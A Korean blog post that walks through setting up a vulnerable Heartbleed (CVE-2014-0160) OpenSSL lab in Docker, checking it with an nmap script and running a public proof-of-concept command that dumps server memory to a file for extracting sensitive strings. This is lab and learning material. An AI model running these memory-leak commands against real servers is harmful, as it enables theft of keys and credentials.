의미없는 블로그
[CVE-2014-0160] HeartBleed OpenSSL 1.0.1e 설치 본문
참고 : https://hub.docker.com/r/hmlio/vaas-cve-2014-0160
PoC : https://github.com/sensepost/heartbleed-poc
$ docker pull hmlio/vaas-cve-2014-0160 : 이미지 다운로드
$ docker images : 이미지 확인
$ docker run -it -d -P --expose="443" --name heartbleed hmlio/vaas-cve-2014-0160 /bin/bash : 컨테이너 생성
$ docker start heartbleed : 컨테이너 시작
$ docker exec -u 0 -it heartbleed /bin/bash : 컨테이너 들어가기
# service apache2 start : 아파치 실행
# exit : 컨테이너 나오기
$ ifconfig | grep inet : IP 확인
$ docker ps : 컨테이너 포트 확인
http://IP:포트 : 서비스 정상 접속 확인
nmap -sV -p 32781 --script=ssl-heartbleed 192.168.19.138 : nmap 스크립트로 취약여부 확인
python heartbleed-poc.py -p 32781 -n 500 -f result.bin 192.168.19.138 : PoC 로 result.bin 파일 생성
strings result.bin >> result.txt : result.bin 파일 result.txt 로 만든다
파일 내 중요정보 확인한다
'# 나 > exploit CVE' 카테고리의 다른 글
[CVE-2019-3394] Confluence Server 6.6.1 설치 (0) | 2019.08.30 |
---|---|
[CVE-2019-3394] Confluence Server Local File Disclosure 취약점 (0) | 2019.08.30 |
[CVE-2019-11581] Atlassian Jira RCE 취약점 (0) | 2019.07.15 |
[Docker] 파일복붙/Dockerfile 사용하기/별첨 CVE-2018-9206 (0) | 2019.06.26 |
[Docker] 컨테이너 생성/실행/접속 (1) | 2019.06.24 |